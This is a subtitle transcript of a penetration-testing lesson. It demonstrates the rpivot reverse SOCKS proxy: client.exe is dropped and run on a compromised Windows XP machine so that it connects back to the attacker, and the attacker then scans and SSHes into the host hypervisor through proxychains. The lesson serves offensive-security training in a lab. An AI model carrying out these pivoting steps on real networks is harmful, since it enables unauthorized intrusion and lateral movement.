1 00:00:00,390 --> 00:00:03,180 Welcome back to Basic Exploit Development.
2 00:00:03,420 --> 00:00:06,990 And today, I'm going to show you a fun tool called rpivot.
3 00:00:08,630 --> 00:00:14,720 So what is rpivot? rpivot is a repository on GitHub that allows the creation of dynamic SOCKS4
4 00:00:14,720 --> 00:00:17,270 proxies that function in reverse.
5 00:00:17,660 --> 00:00:20,900 Normally, against a Linux-like system that you literally have credentials for,
6 00:00:21,200 --> 00:00:26,090 you can create a local proxy port to attack additional machines in the victim's subnet and routing tables
7 00:00:26,090 --> 00:00:32,780 by using the command ssh -N -f -D (dynamic port forwarding) 1080 root@[target].
8 00:00:33,170 --> 00:00:39,710 However, Windows machines, versions 8.1 and above, come with an optional feature to install an OpenSSH
9 00:00:39,710 --> 00:00:41,960 server, not installed by default.
10 00:00:42,470 --> 00:00:51,830 And if we have a Windows XP, 2000, Vista or 7 machine, how can you create a reverse proxy without
11 00:00:51,920 --> 00:00:52,940 having OpenSSH?
12 00:00:52,940 --> 00:01:00,050 Install rpivot as a Python module that turns the victim's machine into a reverse dynamic SOCKS proxy
13 00:01:00,050 --> 00:01:04,970 by having an rpivot server listening on the attacker and featuring a draft for rpivot,
14 00:01:05,120 --> 00:01:09,170 that .exe file, client.exe, that could be installed on the victim.
15 00:01:09,590 --> 00:01:14,840 The rpivot client.exe actually connects back to the specified attacker's IP address and listener server
16 00:01:14,840 --> 00:01:15,200 port.
17 00:01:15,530 --> 00:01:21,560 On the attacker side, it binds a new port of your specification to use proxychains to allow the attacker
18 00:01:21,560 --> 00:01:24,290 to scan through this proxy through the initial victim's network.
19 00:01:26,960 --> 00:01:32,540 In this exercise, we will be using one compromised Windows machine as a proxy to attack additional
20 00:01:32,540 --> 00:01:33,830 machines within the network.
21 00:01:34,220 --> 00:01:38,720 One, we're going to compromise the initial target and gain access to it.
22 00:01:38,840 --> 00:01:41,000 Two, we're going to drop client.exe on the victim.
23 00:01:41,300 --> 00:01:48,380 Three, run client.exe on the victim's command line. Four, use a newly bound local port to proxy through
24 00:01:48,380 --> 00:01:50,930 the initial victim to attack additional machines.
25 00:01:51,980 --> 00:01:54,470 So let's go into our penetration testing boxes.
26 00:01:57,960 --> 00:01:59,070 Here's my directory.
27 00:01:59,580 --> 00:02:06,330 We're going to drop client.exe on the victim, and we're going to show you how to start the
28 00:02:06,330 --> 00:02:06,810 server.
29 00:02:07,560 --> 00:02:09,479 This is just a simple script I made for reference.
30 00:02:10,080 --> 00:02:13,530 So it's python server.py, server
31 00:02:13,530 --> 00:02:15,150 port 9999.
32 00:02:15,570 --> 00:02:16,170 Server.
33 00:02:16,380 --> 00:02:16,920 IP.
34 00:02:17,820 --> 00:02:18,510 Myself.
35 00:02:19,320 --> 00:02:19,950 Proxy.
36 00:02:21,480 --> 00:02:22,080 Proxy.
37 00:02:22,140 --> 00:02:22,740 IP.
38 00:02:23,370 --> 00:02:24,030 Localhost.
39 00:02:24,930 --> 00:02:25,620 Proxy.
40 00:02:25,710 --> 00:02:27,090 Port 1080.
41 00:02:32,600 --> 00:02:36,680 Now we're going to our desktop, into one of our hacked machines that we did before.
42 00:02:45,290 --> 00:02:52,690 Screen resolution, 600 by 900, and the IP address was 125, I believe.
43 00:02:58,220 --> 00:03:05,300 It's important that we create an HTTP server to serve the file to the victim.
44 00:03:05,780 --> 00:03:12,380 So we're going to python -m SimpleHTTPServer 80.
45 00:03:16,740 --> 00:03:17,790 And then our victim.
46 00:03:19,700 --> 00:03:21,650 We're going to navigate to our directory.
47 00:03:26,910 --> 00:03:28,740 And then we're going to download client.exe.
48 00:03:33,360 --> 00:03:35,700 So let's look at the documentation again.
49 00:03:43,590 --> 00:03:49,500 On the victim we need to run client.exe, server IP, my IP address, and server port
50 00:03:49,500 --> 00:03:50,820 9999.
51 00:03:52,810 --> 00:03:55,060 So Windows+R for command line.
52 00:04:04,230 --> 00:04:05,310 Let's see if we can find it.
53 00:04:05,370 --> 00:04:06,120 Yes, we do.
54 00:04:08,450 --> 00:04:11,030 I really wish I could maximize the text on this, guys.
55 00:04:11,420 --> 00:04:11,990 I'm sorry.
56 00:04:12,710 --> 00:04:13,100 I thought.
57 00:04:13,100 --> 00:04:13,670 Excuse.
58 00:04:18,880 --> 00:04:22,390 Server IP 1921681 2110.
59 00:04:23,200 --> 00:04:25,750 Server port 9999.
60 00:04:34,350 --> 00:04:36,450 We now have a new connection from our victim.
61 00:04:37,470 --> 00:04:43,110 And now we're going to play around with proxychains to show you different ways of how I can do it.
62 00:04:44,460 --> 00:04:45,960 Make sure you change that, too,
63 00:04:46,920 --> 00:04:49,200 to socks4 localhost 1080.
64 00:04:51,090 --> 00:04:59,790 Then we want to do proxychains nmap -sT -p 22 -Pn
65 00:05:01,830 --> 00:05:04,470 192.168.122.1.
66 00:05:08,790 --> 00:05:15,480 We notice that our host hypervisor has port 22 open. proxychains
67 00:05:16,410 --> 00:05:17,280 ssh
68 00:05:20,660 --> 00:05:22,850 192.168.122.1.
69 00:05:27,280 --> 00:05:31,600 Look here, this is coming from the Windows machine and it's going into the guest.
70 00:05:35,900 --> 00:05:43,730 And now we've performed lateral movement from the initial hacked Windows machine to the host hypervisor.
71 00:05:47,790 --> 00:05:50,580 So let's try it again and see if it picks up the IP address.
72 00:05:53,380 --> 00:06:03,070 See, it travels from our hacked Windows XP machine, which is this IP address, and we compromised
73 00:06:03,070 --> 00:06:05,740 the host hypervisor using proxychains and rpivot.
74 00:06:06,280 --> 00:06:11,860 This is very, very useful in the event that you're exploiting Windows machines that do not have OpenSSH
75 00:06:11,860 --> 00:06:17,770 installed, allowing you to pivot to other Windows machines on the network or to look for other
76 00:06:17,770 --> 00:06:18,730 targets to attack.